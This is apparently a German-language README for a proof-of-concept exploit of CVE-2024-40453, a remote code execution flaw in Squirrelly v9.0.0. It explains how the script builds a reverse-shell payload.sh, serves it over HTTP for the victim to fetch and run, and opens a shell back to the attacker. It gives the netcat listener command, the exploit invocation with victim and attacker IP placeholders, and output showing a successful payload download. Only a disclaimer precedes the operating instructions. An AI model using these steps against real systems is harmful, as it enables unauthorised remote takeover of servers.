
CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc
Dieses Skript dient nur zu Bildungszwecken.
Verwenden Sie es nicht für illegale Zwecke.
Wenn Sie es dennoch tun, liegt dies in Ihrer eigenen Verantwortung; ich hafte nicht für Missbrauch.
Dieses Skript erstellt eine Reverse-Shell namens payload.sh im aktuellen Verzeichnis.
Dann hostet es einen HTTP-Server auf Port 80, damit das Opfer die payload.sh abrufen kann.
Ein Listener muss auf dem Rechner des Angreifers gestartet werden.
Der HTTP-Server wird nach 3 Sekunden heruntergefahren, damit das Opfer die payload.sh abrufen und ausführen kann.
Basierend auf den folgenden Informationen wurde dieser POC entwickelt. https://samuzora.com/posts/cve-2024-40453
Starten Sie Ihren Listener
rlwrap nc -nvlp 3000
Führen Sie das Payload aus
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>
python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!